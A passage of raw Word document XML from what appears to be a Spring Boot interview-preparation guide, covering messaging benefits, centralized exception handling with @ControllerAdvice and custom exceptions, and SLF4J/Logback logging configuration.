      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Real-time messaging, event-driven architectures, and scalable message delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A624931"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ring Boot Integration</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Spring Cloud GCP offers support for Google Pub/Sub.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479EAE3F" w14:textId="77777777" w:rsidR="00944A37"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5B1FCBC">
          <v:rect id="_x0000_i2687" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D8F91BC" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37"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Key Benefits of Using Messaging Services:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D6B3E2"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ecoupling</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Microservices can communicate with each other without being tightly coupled.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02BFD619"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synchronous Communication</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Allows tasks to be executed in the background, improving system efficiency.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14852D44"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calability</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Messaging systems like Kafka and RabbitMQ can handle large volumes of data, making them suitable for high-throughput applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54263550"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Reliability</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Systems like Kafka and RabbitMQ provide durability and fault tolerance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D823F7" w14:textId="77777777" w:rsidR="00944A37" w:rsidRPr="002C6305" w:rsidRDefault="00944A37"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lastRenderedPageBreak/>
        <w:t>Event-Driven</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Messaging systems are ideal for event-driven architectures where services react to events.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10EFEA5F" w14:textId="67D9D4A5"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270AE40">
          <v:rect id="_x0000_i2688" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9B786A" w14:textId="2F47A83B" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="00EB6369">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="652" w:name="_Toc196308132"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How will you handle errors / exceptions in your project</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="652"/>
    </w:p>
    <w:p w14:paraId="12CDEB41" w14:textId="553109F2" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404"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 Spring Boot, handling errors and exceptions is typically done using </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>centralized exception handling</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> with a combination of the following techniques:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6E2E6" w14:textId="77777777" w:rsidR="00AE640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C476B59">
          <v:rect id="_x0000_i2689" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FB5390" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404"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1. Using @ControllerAdvice and @ExceptionHandler</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC1BC7E"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is the most common way to handle exceptions globally.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F68F267"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trollerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7828684E"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GlobalExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41366129" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E3A403A"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xceptionHandler(ResourceNotFoundException.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BBEE535"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ResponseEntity&lt;String&gt; handleResourceNotFound(ResourceNotFoundException ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="656C10EC"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ResponseEntity&lt;&gt;("Resource not found: " + ex.getMessage(), HttpStatus.NOT_FOUND);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD21282"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7F1D1130" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19296A55"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xceptionHandler(Exception.class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E0F726"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ResponseEntity&lt;String&gt; handleGlobalException(Exception ex) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25765675"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ResponseEntity&lt;&gt;("Internal error: " + ex.getMessage(), HttpStatus.INTERNAL_SERVER_ERROR);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DF7E53"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63FE1C5A"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26929F9C" w14:textId="77777777" w:rsidR="00AE640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AEDE489">
          <v:rect id="_x0000_i2690" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6201E143" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404"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2. Custom Exception Class</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2BAD04"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Define your own exceptions for better clarity and handling.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F995EF4"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ResourceNotFoundException extends RuntimeException {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09DC6AB8"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ResourceNotFoundException(String message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67F6D189"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uper(message);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D1538F"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37F3FCF"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33BFBE25" w14:textId="77777777" w:rsidR="00AE640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365463F">
          <v:rect id="_x0000_i2691" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEE6908" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404"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3. ResponseEntityExceptionHandler (for Validation Errors, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E403EB6"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tend Spring’s built-in handler for more control over validation errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B287B0"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tControllerAdvice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590C2DEC"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CustomExceptionHandler extends ResponseEntityExceptionHandler {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434A9F69" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20D24F78"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verride</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3F7DA5"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otected ResponseEntity&lt;Object&gt; handleMethodArgumentNotValid(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C3EEA0"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MethodArgumentNotValidException ex,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54A60EC5"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HttpHeaders headers,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01918094"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HttpStatus status,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FE4C30"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ebRequest request) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BD9D89" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50517CBE"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Map&lt;String, String&gt; errors = new HashMap&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="612B550C"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x.getBindingResult().getFieldErrors().forEach(err -&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="566A86E6"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rrors.put(err.getField(), err.getDefaultMessage());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC601B7"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7A3CB35A"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ResponseEntity&lt;&gt;(errors, HttpStatus.BAD_REQUEST);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B976CA"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70ED6DC"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F558798" w14:textId="77777777" w:rsidR="00AE640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F4496B6">
          <v:rect id="_x0000_i2692" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F3FAB9C" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404"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4. Validation with @Valid and @NotNull, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A74DE5"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ostMapping("/employee")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75643C4E"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ResponseEntity&lt;Employee&gt; createEmployee(@Valid @RequestBody Employee emp) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216A6EAE"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ResponseEntity&lt;&gt;(employeeService.save(emp), HttpStatus.CREATED);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B24C3E2"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1C7B7132" w14:textId="77777777" w:rsidR="00AE640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755683F4">
          <v:rect id="_x0000_i2693" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B25891" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE6404"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5. Using ResponseEntity with appropriate status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42FC7E81"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Manually returning structured error responses:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8DEDCE"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tMapping("/employee/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE8FAF6"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ResponseEntity&lt;?&gt; getEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF0846A"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mployee emp = employeeService.findById(id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48149034"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rElseThrow(() -&gt; new ResourceNotFoundException("Employee not found with id: " + id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57ECEF7C"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ResponseEntity.ok(emp);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC44A9"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6D2CE59" w14:textId="77777777" w:rsidR="00AE640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3111E8E">
          <v:rect id="_x0000_i2694" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="40432D0F" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE640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62"/>
        <w:gridCol w:w="4237"/>
      </w:tblGrid>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4A4953B2" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6C247489" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE640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Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4D978EAD" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE640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Use</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="334FF2C8" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7A1CAD20"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trollerAdvice + @ExceptionHandler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="392AA02F"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lobal exception handling</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="414E531A" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1D21B5FB"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tControllerAdvice</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="314F1110"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For REST APIs (returns JSON)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="5E95FDB8" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="74D6E070"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ustom Exceptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="726D1A47"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lean and meaningful exception types</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="4728C9C6" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B335349"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ponseEntityExceptionHandler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3B0EF063"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Handling validation errors in form submissions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002C6305" w:rsidRPr="002C6305" w14:paraId="7DF86F02" w14:textId="77777777" w:rsidTr="00AE6404">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="02D19989"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ponseEntity&lt;?&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3DFBBFC3" w14:textId="77777777" w:rsidR="00AE6404" w:rsidRPr="002C6305" w:rsidRDefault="00AE640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o control HTTP response codes and messages</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3BB86BDE" w14:textId="15221945"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CEDAD68">
          <v:rect id="_x0000_i2695" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46222305" w14:textId="5E55A377" w:rsidR="00827C49" w:rsidRPr="00CE4B95" w:rsidRDefault="001C0CE0">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="653" w:name="_Toc196308133"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How are you keeping track of logs in your project</w:t>
      </w:r>
      <w:r w:rsidR="00827C49" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="653"/>
    </w:p>
    <w:p w14:paraId="4FAE658D" w14:textId="2AE7B567" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296"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our Spring Boot project, we manage and track logs using the following structured approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707A9F3F" w14:textId="77777777" w:rsidR="00E16296"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7FEF61E">
          <v:rect id="_x0000_i2696" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B3C299A" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296"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1. Using SLF4J with Logback (Default Logging)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E14BA35"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Spring Boot uses </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Logback</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the default logging framework with </w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SLF4J</w:t>
      </w:r>
      <w:r w:rsidRPr="002C6305">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the facade.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C38651C"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e use the Logger interface to write logs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8BC58D"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lf4j.Logger;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F269F05"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ort org.slf4j.LoggerFactory;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AF52C4" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2C06FBC7"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tController</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F5BB37"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EmployeeController {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481BF01E" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="72D77F25"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static final Logger logger = LoggerFactory.getLogger(EmployeeController.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50359CE3" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296" w:rsidP="002C6305">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33D0806A"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tMapping("/employee/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DB3514"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ResponseEntity&lt;Employee&gt; getEmployee(@PathVariable Long id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5490208C"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ogger.info("Fetching employee with ID: {}", id);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383D845C"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ResponseEntity.ok(service.findById(id));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0B8DAC"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7546C790"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3762D57A" w14:textId="77777777" w:rsidR="00E16296"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B34AE46">
          <v:rect id="_x0000_i2697" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A46E07" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296"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2. Customizing Log Levels via application.properties</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DF209"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ogging.level.root=INFO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47DB27E6"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ogging.level.com.myapp=DEBUG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D967A4C"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ogging.file.name=logs/myapp.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50DE83FC"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ogging.pattern.console=%d{yyyy-MM-dd HH:mm:ss} %-5level %logger{36} - %msg%n</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037A343D" w14:textId="77777777" w:rsidR="00E16296"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0E70F3">
          <v:rect id="_x0000_i2698" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0232CBE6" w14:textId="77777777" w:rsidR="00E16296" w:rsidRPr="002C6305" w:rsidRDefault="00E16296"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3. Log File Rotation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C4F1D2"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ogback supports log rotation to avoid large log files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7DF922"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 In logback-spring.xml --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACB50DD"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rollingPolicy class="ch.qos.logback.core.rolling.TimeBasedRollingPolicy"&gt;</w:t>
      </w:r>
    </w:p>
